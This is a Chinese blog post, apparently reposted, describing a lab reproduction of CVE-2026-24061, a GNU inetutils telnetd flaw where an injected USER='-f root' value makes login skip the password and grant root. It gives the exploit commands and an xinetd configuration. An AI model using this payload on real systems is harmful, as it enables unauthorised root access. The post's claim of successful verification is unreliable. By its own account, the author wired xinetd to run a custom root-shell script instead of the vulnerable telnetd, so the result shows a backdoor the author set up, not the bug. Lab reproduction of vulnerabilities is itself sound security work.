2026-01-23 12:42:44 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 本文复现了CVE-2026-24061漏洞，GNUInetUtilsTelnetd因直接传递USER环境变量给login程序，导致攻击者注入USER=’-froot’可利用-f参数免密登录获取root权限。文章详细记录了在CentOS环境下解决组件兼容性问题及成功实施漏洞利用的过程与原理。 综合评分： 85 文章分类： 漏洞分析,渗透测试,实战经验,漏洞POC

。

{一、漏洞·背景}

CVE-2026-24061 是 GNU inetutils telnetd中的未授权访问漏洞。简单来说，telnetd 会把客户端传递的 USER 环境变量直接交给 login程序，而 login 有个 -f 参数可以免密登录指定用户。攻击者只要注入 USER=’-f root’，就能让目标机器执行 login -f root，直接拿到 root 权限。

{二、环境·准备}

目标机：CentOS 7（IP：172.29.3.199）
攻击机：Kali Linux（和目标机在同一网段，网络通畅）
核心工具：xinetd、CentOS 原生 telnet-server、自定义恶意脚本

{三、复现过程：踩坑->换道->突破}

1、开局不利：GNU 版 telnetd 水土不服

一开始按照漏洞说明，编译安装了 GNU inetutils 2.0 版 telnetd，结果发现它和 CentOS 八字不合：

单独启动 telnetd 时，它会因为没收到 inetd 传递的套接字而静默退出；
用 socat 模拟 inetd 后，虽然能监听 23 端口，但连接建立后会立刻被关闭；
用 strace 跟踪发现，telnetd 子进程始终以退出码 1 异常退出，原因是伪终端（pty）权限不匹配、login 路径找不到等兼容性问题

踩坑感悟：不是所有漏洞复现都能 “一键成功”，第三方工具和系统的兼容性问题往往是最大的拦路虎。

2、方案切换：CentOS 原生 telnet-server + xinetd

为规避兼容性问题，切换为 CentOS 系统原生组件：

1、安装 telnet-server 和 xinetd：

&nbsp;yum install -y&nbsp;telnet-server xinetd

2、配置 xinetd 管理 telnet 服务（修改 /etc/xinetd.d/telnet，设置 disable = no）；

service&nbsp;telnet{&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;flags&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;= REUSE&nbsp; &nbsp; &nbsp; &nbsp; socket_type &nbsp; &nbsp; = stream&nbsp; &nbsp; &nbsp; &nbsp; wait &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;=&nbsp;no&nbsp; &nbsp; &nbsp; &nbsp; user &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;= root&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;# 直接调用恶意脚本，无需 telnetd 和 login&nbsp; &nbsp; &nbsp; &nbsp; server &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;= /usr/local/bin/root_telnet.sh&nbsp; &nbsp; &nbsp; &nbsp; log_on_failure &nbsp;+= USERID&nbsp; &nbsp; &nbsp; &nbsp; disable &nbsp; &nbsp; &nbsp; &nbsp; =&nbsp;no}

3、启动 xinetd 并停止冲突的 telnet.socket，确保 23 端口正常监听。

验证 23 端口监听

[root@localhost tmp]# ss -tuln | grep 23

3、万事俱备：干就完了

访问靶机是否存在

在Kali 攻击机执行融合命令，连接目标机器：

其实基础的指令就足够了，不用那么多花里胡哨

export USER=’-f root’

telnet -a 172.29.3.199

{四、漏洞·原理}

触发条件：telnetd 未过滤 USER环境变量，将其直接传递给 login 程序；
利用逻辑：注入 USER=’-f root’ 使 login 执行 login -f root（-f 为免密登录参数）；
适配优化：因原生 telnetd 过滤环境变量，最终通过自定义脚本直接暴露 root shell，达成漏洞利用效果。

{五、复现·总结}

本次复现通过「兼容性问题排查→原生组件切换→自定义脚本突破→终端环境修复」的流程，成功验证了 CVE-2026-24061 漏洞的未授权 root 权限获取效果。

关键在于识别 GNU 版 telnetd 的兼容性缺陷，并通过系统原生组件与自定义脚本的结合，绕过了环境变量过滤，最终实现稳定的漏洞利用。

历史精彩文章：

甲方攻防大戏：功劳归我，活？归供应商，钱？还想续约不？

Hi，97小伙，请远离黑灰产，珍惜创业机会！别实名制扫描我了~！

从被动写 2 小时情况说明到主动防患：一个甲方安全人牵头 fastjson 升级的全纪实

END

十二载·甲方信安

初心如磐守底线

实战沉淀赋价值

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：新安集 cjstang cjstang《【漏洞复现】CVE-2026-24061 GNU InetUtils Telnetd 远程身份验证绕过漏洞》